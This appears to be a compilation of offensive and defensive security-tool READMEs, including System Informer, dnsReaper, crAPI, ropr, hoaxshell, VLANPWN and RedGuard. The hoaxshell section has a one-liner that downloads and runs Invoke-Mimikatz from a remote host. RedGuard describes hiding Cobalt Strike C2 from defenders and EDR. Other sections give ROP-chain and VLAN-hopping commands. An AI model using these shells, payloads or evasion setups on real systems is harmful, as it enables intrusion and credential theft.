System Informer - A Free, Powerful, Multi-Purpose Tool That Helps You Monitor System Resources, Debug Software And Detect Malware

System Informer

A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware. Brought to you by Winsider Seminars & Solutions, Inc.

Project Website - Project Downloads


System requirements

Windows 7 or higher, 32-bit or 64-bit.

Features

  • A detailed overview of system activity with highlighting.
  • Graphs and statistics allow you to quickly track down resource hogs and runaway processes.
  • Can't edit or delete a file? Discover which processes are using that file.
  • See what programs have active network connections, and close them if necessary.
  • Get real-time information on disk access.
  • View detailed stack traces with kernel-mode, WOW64 and .NET support.
  • Go beyond services.msc: create, edit and control services.
  • Small, portable and no installation required.
  • 100% Free Software (MIT)

Building the project

Requires Visual Studio (2022 or later).

Execute build_release.cmd located in the build directory to compile the project or load the SystemInformer.sln and Plugins.sln solutions if you prefer building the project using Visual Studio.

You can download the free Visual Studio Community Edition to build the System Informer source code.

See the build readme for more information or if you're having trouble building.

Enhancements/Bugs

Please use the GitHub issue tracker for reporting problems or suggesting new features.

Settings

If you are running System Informer from a USB drive, you may want to save System Informer's settings there as well. To do this, create a blank file named "SystemInformer.exe.settings.xml" in the same directory as SystemInformer.exe. You can do this using Windows Explorer (or with the one-line script shown after these steps):

  1. Make sure "Hide extensions for known file types" is unticked in Tools > Folder options > View.
  2. Right-click in the folder and choose New > Text Document.
  3. Rename the file to SystemInformer.exe.settings.xml (delete the ".txt" extension).
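
If you prefer scripting it, the same blank file can be created with a single line. A minimal Python sketch, assuming it is run from the directory containing SystemInformer.exe:

from pathlib import Path

# Create the blank per-directory settings file next to SystemInformer.exe
Path("SystemInformer.exe.settings.xml").touch()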

Plugins

Plugins can be configured from Options > Plugins.

If you experience any crashes involving plugins, make sure they are up to date.

Disk and Network information provided by the ExtendedTools plugin is only available when running System Informer with administrative rights.



RPCMon - RPC Monitor Tool Based On Event Tracing For Windows

A GUI tool for scanning RPC communication through Event Tracing for Windows (ETW). The tool was published as part of research on RPC communication between the host and a Windows container.

Overview

RPCMon can help researchers get a high-level view of RPC communication between processes. It was built like Procmon for ease of use, and uses James Forshaw's .NET library for RPC. RPCMon can show you the RPC functions being called, the process that called them, and other relevant information.
RPCMon uses a hardcoded RPC dictionary containing information about RPC modules for fast processing. It also has an option to build an RPC database from your own computer, in case some details are missing from the hardcoded dictionary.

Usage

Double-click the EXE binary and the GUI window will open.
RPCMon needs a DB to get the details on the RPC functions; without a DB you will have missing information.
To load the DB, click DB -> Load DB... and choose your DB. You can use the DB we added to this project: /DB/RPC_UUID_Map_Windows10_1909_18363.1977.rpcdb.json.

Features

  • A detailed overview of RPC functions activity.
  • Build an RPC database to parse RPC modules or use hardcoded database.
  • Filter/highlight rows based on cells.
  • Bold specific rows.

Credit

We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get the RPC functions.

License

Copyright (c) 2022 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.

References:

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



Concealed_Code_Execution - Tools And Technical Write-Ups Describing Attacking Techniques That Rely On Concealing Code Execution On Windows


Hunt & Hackett presents a set of tools and technical write-ups describing attacking techniques that rely on concealing code execution on Windows. Here you will find explanations of how these techniques work, receive advice on detection, and get sample source code for testing your detection coverage.


Content

This repository covers two classes of attacking techniques that extensively use internal Windows mechanisms, plus suggestions and tools for detecting them:

  • Process Tampering - a set of techniques that conceal the code on the scale of an entire process.
  • Code Injection - a collection of tricks that allow executing code as part of other processes without interfering with their functionality.
  • Detection - a compilation of recommendations for defending against various techniques for concealing code execution.

The core values of the project:

  • The systematic approach. This repository includes more than just a collection of tools or links to external resources. Each subject receives a detailed explanation of the underlying concepts; each specific case gets classified into generic categories.
  • Proof-of-concept tooling. The write-ups are accompanied by example projects in C that demonstrate the use of the described facilities in practice.
  • Beginner to professional. You don't need to be a cybersecurity expert to understand the concepts we describe. Yet, even professionals in the corresponding domain should find the content valuable and educational because of the attention to detail and pitfalls.

Implementation

One final distinctive feature of this project is the extensive use of Native API throughout the samples. Here is the motivation for this choice:

  1. Functionality. Some operations required for the most advanced techniques (such as Process Tampering) are not exposed via other APIs.
  2. Control. Being the lowest level of interaction with the operating system, it provides the most control over its behavior. The Win32 API is implemented on top of Native API, so whatever is possible to achieve with the former is also possible with the latter.
  3. Availability. Being exposed by ntdll.dll, Native API is available in all processes, including the system ones (see the sketch after this list).
  4. Consistency. The interfaces exposed by this API are remarkably consistent. After learning the fundamental design choices, it becomes possible to correctly predict the majority of function prototypes just from the API's name.
  5. Resistance to hooking. It is substantially easier to remove or bypass user-mode hooks when using Native API, partially blinding security software. There are no lower-level libraries that might be patched, so unhooking becomes as simple as loading a second instance of ntdll.dll and redirecting the calls there.
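
To illustrate points 3 and 4, here is a minimal Python ctypes sketch (not part of the repository, whose samples are in C; assumes a 64-bit Windows host) calling a Native API function directly from ntdll.dll:

import ctypes

# Native API calls follow a regular pattern: NTSTATUS Nt*(...) with
# out-parameters for results. NtQuerySystemInformation takes an
# information class, a caller-supplied buffer, its size, and an
# optional length out-parameter.
ntdll = ctypes.WinDLL("ntdll")

SystemBasicInformation = 0  # SYSTEM_INFORMATION_CLASS value
buf = ctypes.create_string_buffer(64)
ret_len = ctypes.c_ulong(0)

status = ntdll.NtQuerySystemInformation(
    SystemBasicInformation, buf, ctypes.sizeof(buf), ctypes.byref(ret_len)
)
print(f"NTSTATUS: {status & 0xFFFFFFFF:#010x}, bytes returned: {ret_len.value}")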

Compiling Remarks

The sample code uses the Native API headers provided by the PHNT project. Make sure to clone the repository using the git clone --recurse-submodules command to fetch this dependency. Alternatively, you can use git submodule update --init after cloning the repository.

To build the projects included with the repository, you will need a recent version of the Windows SDK. If you use Visual Studio, please refer to the built-in SDK installation. Alternatively, you can use the standalone build environment of the EWDK. To compile all tools at once, use MSBuild AllTools.sln /t:build /p:configuration=Release /p:platform=x64.



dnsReaper - Subdomain Takeover Tool For Attackers, Bug Bounty Hunters And The Blue Team!


DNS Reaper is yet another sub-domain takeover tool, but with an emphasis on accuracy, speed and the number of signatures in our arsenal!

We can scan around 50 subdomains per second, testing each one with over 50 takeover signatures. This means most organisations can scan their entire DNS estate in less than 10 seconds.


You can use DNS Reaper as an attacker or bug hunter!

You can run it by providing a list of domains in a file, or a single domain on the command line. DNS Reaper will then scan the domains with all of its signatures, producing a CSV file.

You can use DNS Reaper as a defender!

You can run it by letting it fetch your DNS records for you! Yes that's right, you can run it with credentials and test all your domain config quickly and easily. DNS Reaper will connect to the DNS provider and fetch all your records, and then test them.

We currently support AWS Route53, Cloudflare, and Azure. Documentation on adding your own provider can be found here

You can use DNS Reaper as a DevSecOps Pro!

Punk Security are a DevSecOps company, and DNS Reaper has its roots in modern security best practice.

You can run DNS Reaper in a pipeline, feeding it a list of domains that you intend to provision, and it will exit Non-Zero if it detects a takeover is possible. You can prevent takeovers before they are even possible!
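
As a sketch of what that gate might look like (the --pipeline flag is documented in the full usage below; domains.txt is a hypothetical file of one domain per line):

import subprocess

# Vet the domains we are about to provision; --pipeline makes
# DNS Reaper exit non-zero if a takeover is possible.
result = subprocess.run(
    ["python", "main.py", "file", "--filename", "domains.txt", "--pipeline"]
)
if result.returncode != 0:
    raise SystemExit("Possible subdomain takeover detected - failing the build")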

Usage

To run DNS Reaper, you can use the Docker image or run it with Python 3.10.

Findings are returned in the output and more detail is provided in a local "results.csv" file. We also support json output as an option.

Run it with docker

docker run punksecurity/dnsreaper --help

Run it with python

pip install -r requirements.txt
python main.py --help

Common commands

  • Scan AWS account:

    docker run punksecurity/dnsreaper aws --aws-access-key-id <key> --aws-access-key-secret <secret>

    For more information, see the documentation for the aws provider

  • Scan all domains from file:

    docker run -v $(pwd):/etc/dnsreaper punksecurity/dnsreaper file --filename /etc/dnsreaper/<filename>

  • Scan single domain

    docker run punksecurity/dnsreaper single --domain <domain>

  • Scan single domain and output to stdout:

    You should either redirect the stderr output or save stdout output with >

    docker run punksecurity/dnsreaper single --domain <domain> --out stdout --out-format=json > output

Full usage

[ASCII-art banner: Punk Security presents DNS Reaper ☠️]

Scan all your DNS records for subdomain takeovers!

usage:
.\main.py provider [options]

output:
findings output to screen and (by default) results.csv

help:
.\main.py --help

providers:
> aws - Scan multiple domains by fetching them from AWS Route53
> azure - Scan multiple domains by fetching them from Azure DNS services
> bind - Read domains from a dns BIND zone file, or path to multiple
> cloudflare - Scan multiple domains by fetching them from Cloudflare
> file - Read domains from a file, one per line
> single - Scan a single domain by providing a domain on the commandline
> zonetransfer - Scan multiple domains by fetching records via DNS zone transfer

positional arguments:
{aws,azure,bind,cloudflare,file,single,zonetransfer}

options:
-h, --help Show this help message and exit
--out OUT Output file (default: results) - use 'stdout' to stream out
--out-format {csv,json}
--resolver RESOLVER
Provide a custom DNS resolver (or multiple separated by commas)
--parallelism PARALLELISM
Number of domains to test in parallel - too high and you may see odd DNS results (default: 30)
--disable-probable Do not check for probable conditions
--enable-unlikely Check for more conditions, but with a high false positive rate
--signature SIGNATURE
Only scan with this signature (multiple accepted)
--exclude-signature EXCLUDE_SIGNATURE
Do not scan with this signature (multiple accepted)
--pipeline Exit Non-Zero on detection (used to fail a pipeline)
-v, --verbose -v for verbose, -vv for extra verbose
--nocolour Turns off coloured text

aws:
Scan multiple domains by fetching them from AWS Route53

--aws-access-key-id AWS_ACCESS_KEY_ID
Optional
--aws-access-key-secret AWS_ACCESS_KEY_SECRET
Optional

azure:
Scan multiple domains by fetching them from Azure DNS services

--az-subscription-id AZ_SUBSCRIPTION_ID
Required
--az-tenant-id AZ_TENANT_ID
Required
--az-client-id AZ_CLIENT_ID
Required
--az-client-secret AZ_CLIENT_SECRET
Required

bind:
Read domains from a dns BIND zone file, or path to multiple

--bind-zone-file BIND_ZONE_FILE
Required

cloudflare:
Scan multiple domains by fetching them from Cloudflare

--cloudflare-token CLOUDFLARE_TOKEN
Required

file:
Read domains from a file, one per line

--filename FILENAME Required

single:
Scan a single domain by providing a domain on the commandline

--domain DOMAIN Required

zonetransfer:
Scan multiple domains by fetching records via DNS zone transfer

--zonetransfer-nameserver ZONETRANSFER_NAMESERVER
Required
--zonetransfer-domain ZONETRANSFER_DOMAIN
Required


crAPI - Completely Ridiculous API


completely ridiculous API (crAPI) will help you to understand the ten most critical API security risks. crAPI is vulnerable by design, but you'll be able to safely run it to educate/train yourself.

crAPI is modern, built on top of a microservices architecture. When the time comes to buy your first car, sign up for an account and start your journey. To know more about crAPI, please check crAPI's overview.


QuickStart Guide

Docker

You'll need to have Docker installed and running on your host system.

Using prebuilt images

You can use prebuilt images generated by our CI workflow.

  • To use the latest stable version.

    • Linux Machine
    curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml

    docker-compose pull

    docker-compose -f docker-compose.yml --compatibility up -d
    • Windows Machine
    curl.exe -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml

    docker-compose pull

    docker-compose -f docker-compose.yml --compatibility up -d
  • To use the latest development version

    • Linux Machine
    curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/develop/deploy/docker/docker-compose.yml

    VERSION=develop docker-compose pull

    VERSION=develop docker-compose -f docker-compose.yml --compatibility up -d
    • Windows Machine
    (use the same commands as for a Linux machine, with curl.exe in place of curl)

    Visit http://localhost:8888

    Note: All emails are sent to the mailhog service by default and can be checked on http://localhost:8025. You can change the SMTP configuration if required; however, all emails with the domain example.com will still go to mailhog.

Vagrant

This option allows you to run crAPI within a virtual machine, isolated from your system. You'll need to have Vagrant and, for example, VirtualBox installed.

  1. Clone crAPI repository
    $ git clone [REPOSITORY-URL]
  2. Start crAPI Virtual Machine
    $ cd deploy/vagrant && vagrant up
  3. Visit http://192.168.33.20

Note: All emails are sent to the mailhog service and can be checked on http://192.168.33.20:8025

Once you're done playing with crAPI, you can remove it completely from your system by running the following command from the repository root directory:

$ cd deploy/vagrant && vagrant destroy

For more deployment options, visit the setup instructions.

To know more about the challenges in crAPI, visit challenges.



Ropr - A Blazing Fast Multithreaded ROP Gadget Finder. Ropper / Ropgadget Alternative


ropr is a blazing fast multithreaded ROP Gadget finder

What is a ROP Gadget?

ROP (Return Oriented Programming) gadgets are small snippets of a few assembly instructions, typically ending in a ret instruction, which already exist as executable code within each binary or library. These gadgets may be used for binary exploitation and to subvert vulnerable executables.

When the addresses of many ROP Gadgets are written into a buffer we have formed a ROP Chain. If an attacker can move the stack pointer into this ROP Chain then control can be completely transferred to the attacker.

Most executables contain enough gadgets to write a Turing-complete ROP chain. For those that don't, one can always use dynamic libraries contained in the same address space, such as libc, once we know their addresses.

The beauty of using ROP Gadgets is that no new executable code needs to be written anywhere - an attacker may achieve their objective using only the code that already exists in the program.


How do I use a ROP Gadget?

Typically the first requirement to use ROP Gadgets is to have a place to write your ROP Chain - this can be any readable buffer. Simply write the addresses of each gadget you would like to use into this buffer. If the buffer is too small there may not be enough room to write a long ROP Chain into and so an attacker should be careful to craft their ROP Chain to be efficient enough to fit into the space available.

The next requirement is to be able to control the stack - this can take the form of a stack overflow, which allows the ROP chain to be written directly under the stack pointer, or a "stack pivot", which is usually a single gadget that moves the stack pointer to the rest of the ROP chain.

Once the stack pointer is at the start of your ROP chain, the next ret instruction will trigger the gadgets to be executed in sequence - each using the next as its return address on its own stack frame.

It is also possible to add function pointers into a ROP chain - taking care that function arguments are supplied after the next element of the ROP chain. This is typically combined with a "pop gadget", which pops the arguments off the stack in order to smoothly transition to the next gadget after the function arguments.
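
For intuition, here is a minimal Python sketch of packing a chain (all addresses are hypothetical and the x86-64 calling convention is assumed; a real chain would use addresses reported by a gadget finder such as ropr):

import struct

# Hypothetical addresses found with a gadget finder
POP_RDI_RET = 0x00401234  # pop rdi; ret
SYSTEM_PLT  = 0x00401050  # address of system()
BINSH_STR   = 0x00602060  # address of the string "/bin/sh"

# A ROP chain is just these addresses laid out in the order the
# ret instructions will consume them.
chain = b"".join(struct.pack("<Q", qword) for qword in (
    POP_RDI_RET,  # ret lands here: pops the next qword into rdi
    BINSH_STR,    # becomes system()'s argument
    SYSTEM_PLT,   # the next ret transfers control to system("/bin/sh")
))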

How do I install ropr?

  • Requires cargo (the rust build system)

Easy install:

cargo install ropr

the application will install to ~/.cargo/bin

From source:

git clone https://github.com/Ben-Lichtman/ropr
cd ropr
cargo build --release

the resulting binary will be located in target/release/ropr

Alternatively:

git clone https://github.com/Ben-Lichtman/ropr
cd ropr
cargo install --path .

the application will install to ~/.cargo/bin

How do I use ropr?

For example, if I were looking for a way to fill rax with a value from another register, I might filter by the regex ^mov eax, ...;.
Adding some filters to the command line gives the highest-quality results - in this case, a good mov gadget candidate at address 0x00052252.

Hoaxshell - An Unconventional Windows Reverse Shell, Currently Undetected By Microsoft Defender And Various Other AV Solutions, Solely Based On Http(S) Traffic


hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions, as it is solely based on http(s) traffic. The tool is easy to use: it generates its own PowerShell payload and it supports encryption (SSL).

So far, it has been tested on fully updated Windows 11 Enterprise and Windows 10 Pro boxes (see video and screenshots).


Video Presentation

Screenshots

Find more screenshots here.

Installation

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

Usage

Basic shell session over http

sudo python3 hoaxshell.py -s <your_ip>

When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject on the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the "rawpayload" prompt command or start hoaxshell with the -r argument. After the payload has been executed on the victim, you'll be able to run PowerShell commands against it.

Encrypted shell session (https):

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

The generated PowerShell payload will be longer because of an additional block of code that disables SSL certificate validation.

Grab session mode

If you accidentally close your terminal, suffer a power outage, or similar, you can start hoaxshell in grab session mode: it will attempt to re-establish a session, provided the payload is still running on the victim machine.

sudo python3 hoaxshell.py -s <your_ip> -g

Important: Make sure to start hoaxshell with the same settings as the session you are trying to restore (http/https, port, etc).

Limitations

The shell is going to hang if you execute a command that initiates an interactive session. Example:

# this command will execute successfully and you will have no problem: 
> powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell

# In the same manner, you won't have a problem executing this:
> cmd /c dir /a

# But this will cause your hoaxshell to hang:
> cmd.exe

So if, for example, you would like to run Mimikatz through hoaxshell, you would need to invoke it as a one-liner:

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell powershell context.

Future

I am currently working on some auxiliary-type prompt commands to automate parts of host enumeration.



VLANPWN - VLAN Attacks Toolkit


VLAN attacks toolkit

DoubleTagging.py - This tool carries out a VLAN hopping attack by injecting a frame with two 802.1Q tags; a test ICMP request is sent as part of the injection.

DTPHijacking.py - A script for conducting a DTP switch spoofing/hijacking attack. It sends a malicious DTP-Desirable frame, as a result of which the attacker's machine becomes a trunk port, allowing the attacker to bypass VLAN segmentation and see the traffic of all VLANs.
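
For illustration, a Scapy sketch of the double-tagged frame the first tool injects (not the tool's source; the interface and addresses are taken from the example below, and Scapy must run with root privileges):

from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

# The outer tag carries the native VLAN (stripped by the first switch);
# the inner tag carries the target VLAN the frame "hops" into.
frame = (
    Ether()
    / Dot1Q(vlan=1)    # native VLAN ID
    / Dot1Q(vlan=20)   # target VLAN ID
    / IP(src="10.10.10.54", dst="10.10.20.24")  # attacker -> victim
    / ICMP()
)
sendp(frame, iface="eth0")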

python3 DoubleTagging.py --help

[ASCII-art banner]

VLAN Double Tagging inject tool. Jump into another VLAN!

Author: @necreas1ng, <necreas1ng@protonmail.com>

usage: DoubleTagging.py [-h] --interface INTERFACE --nativevlan NATIVEVLAN --targetvlan TARGETVLAN --victim VICTIM --attacker ATTACKER

options:
-h, --help show this help message and exit
--interface INTERFACE
Specify your network interface
--nativevlan NATIVEVLAN
Specify the Native VLAN ID
--targetvlan TARGETVLAN
Specify the target VLAN ID for attack
--victim VICTIM Specify the target IP
--attacker ATTACKER Specify the attacker IP

Example:

python3 DoubleTagging.py --interface eth0 --nativevlan 1 --targetvlan 20 --victim 10.10.20.24 --attacker 10.10.10.54
python3 DTPHijacking.py --help

[ASCII-art banner]

DTP Switch Hijacking tool. Become a trunk!

Author: @necreas1ng, <necreas1ng@protonmail.com>

usage: DTPHijacking.py [-h] --interface INTERFACE

options:
-h, --help show this help message and exit
--interface INTERFACE
Specify your network interface

Example:

python3 DTPHijacking.py --interface eth0


RedGuard - C2 Front Flow Control Tool, Can Avoid Blue Teams, AVs, EDRs Check


0x00 Introduction

Tool introduction

RedGuard is a derivative work on C2 facility pre-flow control. It has a lighter design, efficient flow interaction, and reliable compatibility thanks to its Go implementation. The core problem it solves: in the face of increasingly complex red-blue attack and defense drills, it gives the attacking team a better C2 infrastructure concealment scheme, adds flow control to the C2 facility's interactive traffic, and intercepts "malicious" analysis traffic, helping to complete the entire attack mission.

RedGuard is a C2 facility pre-flow control tool that can evade checks by blue teams, AVs, EDRs, and cyberspace search engines.


Application scenarios

  • During offensive and defensive drills, hinder defenders who analyze and trace C2 interaction traffic via situational awareness platforms
  • Identify and block malicious analysis of Trojan samples in cloud sandbox environments, based on a JA3 fingerprint library
  • Block malicious replay-attack requests that aim to produce confusing check-ins
  • When the check-in server's IP is known, restrict access to interactive traffic via a whitelist
  • Prevent scanning and identification of C2 facilities by cyberspace mapping technology, redirecting or intercepting probe traffic
  • Support pre-flow control for multiple C2 servers, enabling domain fronting and load-balanced check-ins for better concealment
  • Restrict check-ins to hosts in specific regions by looking up the request IP's attribution via a reverse-lookup API
  • Resolve the strong staging feature of checksum8 rule path parsing without changing the source code
  • Analyze blue team tracing behavior through interception logs of target requests, which can be used to track peer connection events/issues
  • Restrict legitimate sample interaction to a custom time window, so traffic interaction happens only during working hours
  • Malleable C2 Profile parser capable of validating inbound HTTP/S requests strictly against a malleable profile and dropping outgoing packets in case of violation (supports Malleable Profiles 4.0+)
  • Built-in IPv4 blacklist of a large number of devices, honeypots, and cloud sandboxes associated with security vendors, to automatically intercept and redirect request traffic
  • Customizable SSL certificate information and redirect URLs for sample interaction, circumventing fixed tool-traffic characteristics
  • ..........

0x01 Install

You can download and use the compiled version directly, or fetch the Go source and compile it yourself.

git clone https://github.com/wikiZ/RedGuard.git
cd RedGuard
# You can also use upx to compress the compiled file size
go build -ldflags "-s -w" -trimpath
# Give the tool executable permission and perform initialization operations
chmod +x ./RedGuard&&./RedGuard

0x02 Configuration Description

initialization

As shown in the figure below, first grant executable permissions to RedGuard and perform initialization operations. The first run will generate a configuration file in the current user directory to achieve flexible function configuration. Configuration file name: .RedGuard_CobaltStrike.ini.


Configuration file content:


The cert options configure the certificate used for HTTPS traffic between the sample and the C2 front-end facility. The proxy options configure flow control for the reverse proxy. Their specific use is explained in detail below.

The SSL certificate used in the traffic interaction is generated in the cert-rsa/ directory under the directory where RedGuard is executed. You can start and stop the tool's basic functions by modifying the configuration file (the certificate's serial number is generated from the timestamp, so don't worry about being associated through this feature). If you want to use your own certificate, just rename the files to ca.crt and ca.key.

openssl x509 -in ca.crt -noout -text


A random TLS JARM fingerprint is generated each time RedGuard starts, to prevent JARM from being used to fingerprint the C2 facility.


If you use your own certificate, set the HasCert parameter in the configuration file to true; otherwise the JARM randomization may select CipherSuites incompatible with the custom certificate and break normal communication.

# Whether to use the certificate you have applied for true/false
HasCert = false

RedGuard Usage

root@VM-4-13-ubuntu:~# ./RedGuard -h

Usage of ./RedGuard:
-DropAction string
RedGuard interception action (default "redirect")
-EdgeHost string
Set Edge Host Communication Domain (default "*")
-EdgeTarget string
Set Edge Host Proxy Target (default "*")
-HasCert string
Whether to use the certificate you have applied for (default "true")
-allowIP string
Proxy Requests Allow IP (default "*")
-allowLocation string
Proxy Requests Allow Location (default "*")
-allowTime string
Proxy Requests Allow Time (default "*")
-common string
Cert CommonName (default "*.aliyun.com")
-config string
Set Config Path
-country string
Cert Country (default "CN")
-dns string
Cert DNSName
-host string
Set Proxy HostTarget
-http string
Set Proxy HTTP Port (default ":80")
-https string
Set Proxy HTTPS Port (default ":443")
-ip string
IPLookUP IP
-locality string
Cert Locality (default "HangZhou")
-location string
IPLookUP Location (default "风起")
-malleable string
Set Proxy Requests Filter Malleable File (default "*")
-organization string
Cert Organization (default "Alibaba (China) Technology Co., Ltd.")
-redirect string
Proxy redirect URL (default "https://360.net")
-type string
C2 Server Type (default "CobaltStrike")
-u Enable configuration file modification

P.S. You can use the command-line parameters to modify the configuration file, though it may be more convenient to edit it manually with vim.

0x03 Tool usage

basic interception

If you directly access the port of the reverse proxy, the interception rule is triggered. In the output log you can see the client requesting the root directory; because the request does not carry the required credential - the correct HOST request header - the basic interception rule fires and the traffic is redirected to https://360.net.

Here the output is shown in the foreground for demonstration; in actual use, RedGuard can be run in the background via nohup ./RedGuard &.


{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}

It is easy to see from the slice above that 360.net proxies to local port 8080 over HTTP, and 360.com to local port 4433 over HTTPS. When bringing implants online, make sure the listener's protocol type is consistent with the one set here, and set the corresponding HOST request header.
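
A quick way to see the HOST-header check in action - a hedged sketch using Python requests, where the proxy address is hypothetical and 360.com comes from the mapping above:

import requests

PROXY = "https://203.0.113.10"  # hypothetical RedGuard reverse-proxy address

# Without the expected HOST header, the interception rule fires and
# we receive the redirect/clone site's response instead.
blocked = requests.get(PROXY, verify=False)

# With a HOST header matching a configured mapping, the request is
# proxied through to the C2 listener behind RedGuard.
allowed = requests.get(PROXY, headers={"Host": "360.com"}, verify=False)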


As shown above, in the case of unauthorized access, the response we receive is the return information of the redirect site.

interception method

In the basic interception case above, the default interception method is used: illegal traffic is intercepted by redirection. By modifying the configuration file, we can change the interception method and the redirect site URL. One alternative, proxy, might be more aptly described as hijacking or cloning: the response status code returned is 200, and the response is taken from another website to mimic the cloned/hijacked website as closely as possible.

Invalid packets can be misrouted according to three strategies:

  • reset: Terminate the TCP connection immediately.
  • proxy: Get a response from another website to mimic the cloned/hijacked website as closely as possible.
  • redirect: redirect to the specified website and return HTTP status code 302, there is no requirement for the redirected website.
# RedGuard interception action: redirect / reset / proxy (Hijack HTTP Response)
drop_action = proxy
# URL to redirect to
Redirect = https://360.net

The Redirect = URL entry in the configuration file points to the hijacked URL address. RedGuard supports "hot change": while the tool is running in the background through nohup, we can still modify the configuration file, and the changes take effect in real time.

./RedGuard -u --drop true

Note that when modifying the configuration file through the command line, the -u option must not be omitted, otherwise the configuration file cannot be modified successfully. If you need to restore the default configuration file settings, you only need to enter ./RedGuard -u.

Another interception method is DROP, which directly closes the HTTP communication response; it is enabled by setting DROP = true. The specific interception effect is as follows:


As you can see, the C2 pre-flow control answers illegal requests without any HTTP response code. Against cyberspace mapping detection, the DROP method can make the open port appear closed; the specific effect can be seen in the case analysis below.

Proxy port modification

The following two parameters in the configuration file change the reverse proxy ports. It is recommended to use the default ports unless they conflict with ports already in use on the server; if they must be modified, make sure the leading : of the parameter value is not omitted.

# HTTPS Reverse proxy port
Port_HTTPS = :443
# HTTP Reverse proxy port
Port_HTTP = :80

RedGuard logs

Blue team tracing behavior can be analyzed through the interception log of target requests and used to track peer connection events/problems. The log file is generated in the directory where RedGuard is running, with file name RedGuard.log.

 

RedGuard Obtain the real IP address

This section describes how to configure the C2 to obtain the real IP address of a request. You only need to add the following configuration to the C2 profile, which takes the target's real IP from the X-Forwarded-For request header.

http-config {
set trust_x_forwarded_for "true";
}

Request geographic restrictions

The configuration method takes AllowLocation = Jinan, Beijing as an example. Note that RedGuard provides two APIs for IP attribution lookup, one for users inside China and one for users elsewhere, and it dynamically decides which API to use: if the target is in China, enter Chinese place names for the region; otherwise, enter English place names. Domestic users are advised to use Chinese names, which gives the best attribution accuracy and API response speed.

P.S. Domestic users should not mix forms like AllowLocation = Jinan,beijing - the first character of the parameter value determines which API is used!

# IP address owning restrictions example:AllowLocation = 山东,上海,杭州 or shanghai,beijing
AllowLocation = *

 

Before deciding to restrict the region, you can manually query the IP address by the following command.

./RedGuard --ip 111.14.218.206
./RedGuard --ip 111.14.218.206 --location shandong # Use overseas API to query

Here we allow only the Shandong region to come online:

 

Legit traffic:

 

Illegal request area:

 

Geographical restrictions may be especially practical in current offensive and defensive drills: the targets in provincial and municipal protection exercises are generally in designated areas, so traffic requested from other areas can safely be ignored. RedGuard can restrict not just a single region but multiple check-in regions by province and city, intercepting traffic requested from anywhere else.

Blocking based on whitelist

In addition to RedGuard's built-in blacklist of security vendor IPs, we can also restrict by whitelist. In fact, I suggest that when managing implants you whitelist the expected check-in IP addresses, separating multiple addresses with commas.

# Whitelist list example: AllowIP = 172.16.1.1,192.168.1.1
AllowIP = 127.0.0.1

 

As shown above, we only allow 127.0.0.1 to come online; request traffic from other IPs is intercepted.

Block based on time period

This function is more interesting. Setting the following parameter values in the configuration file means the traffic-controlled facility can only come online between 8:00 am and 9:00 pm. The application scenario: during the specified attack window we allow traffic to interact with the C2, and remain silent at other times. This also allows the red team to get a good night's sleep without worrying that some bored blue teamer on the night shift will analyze your Trojan and wake you up to something indescribable, hahaha.

# Limit the time of requests example: AllowTime = 8:00 - 16:00
AllowTime = 8:00 - 21:00


Malleable Profile

RedGuard uses the Malleable C2 profile: it parses the provided malleable configuration file to understand the contract, passes only those inbound requests that satisfy it, and misleads all others. Sections such as http-stager, http-get and http-post, and their corresponding uris, headers, User-Agent, etc., are used to distinguish legitimate beacon requests from irrelevant Internet noise and out-of-band IR/AV/EDR packets.

# C2 Malleable File Path
MalleableFile = /root/cobaltstrike/Malleable.profile


The profile written by 风起 is recommended:

https://github.com/wikiZ/CobaltStrike-Malleable-Profile

0x04 Case Study

Cyberspace Search Engine

As shown below, when the interception rule is set to DROP, the space-mapping probe scans the / directory of our reverse proxy port several times. In theory the probe's request packets are disguised as normal traffic, but after several attempts, because the packets' characteristics do not meet RedGuard's release requirements, they are all answered by closing the HTTP connection. The final effect displayed on the mapping platform is that the reverse proxy port is not open.

 

The traffic below shows the interception rule set to Redirect: when the mapping probe receives a response, it continues to scan our directories, with randomized User-Agents that appear to be normal traffic requests, but all of them are successfully blocked.


Mapping Platform - Hijack Response Intercept Mode Effect:


Surveying and mapping platform - effect of redirection interception:


Domain fronting

RedGuard supports domain fronting, which in my view takes two forms. One is the traditional domain fronting method: set our reverse proxy port as the back-to-origin address of a site-wide CDN acceleration. This adds flow control on top of the original domain fronting, and traffic can be redirected to a specified URL per our settings to make the front look more real. Note that RedGuard's HTTPS HOST header setting must be consistent with the domain name of the site-wide acceleration.


For solo operations I suggest the method above; in team tasks, it can also be achieved by self-built "domain fronting".

 

In self-built domain fronting, keep the reverse proxy ports on all nodes consistent, with the HOST header consistently pointing to the real C2 server's backend listening port. This way our real C2 server is well hidden, and the reverse proxy servers can expose only the proxy port through firewall configuration.


This can be achieved through multiple node servers, configuring our nodes' IPs as the HTTPS check-in addresses of the CS listener.

Edge Node

RedGuard 22.08.03 added edge host check-in settings: a custom interaction domain for the intranet host, while the edge host interacts through the domain-fronting CDN node. The information exchanged by the two hosts is thus asymmetric, making tracing and investigation much more difficult.


CobaltStrike

A caveat of the above method is that the actual C2 server cannot simply be shielded with a firewall, because the load-balanced requests from the reverse proxy arrive from the cloud vendor's IPs.

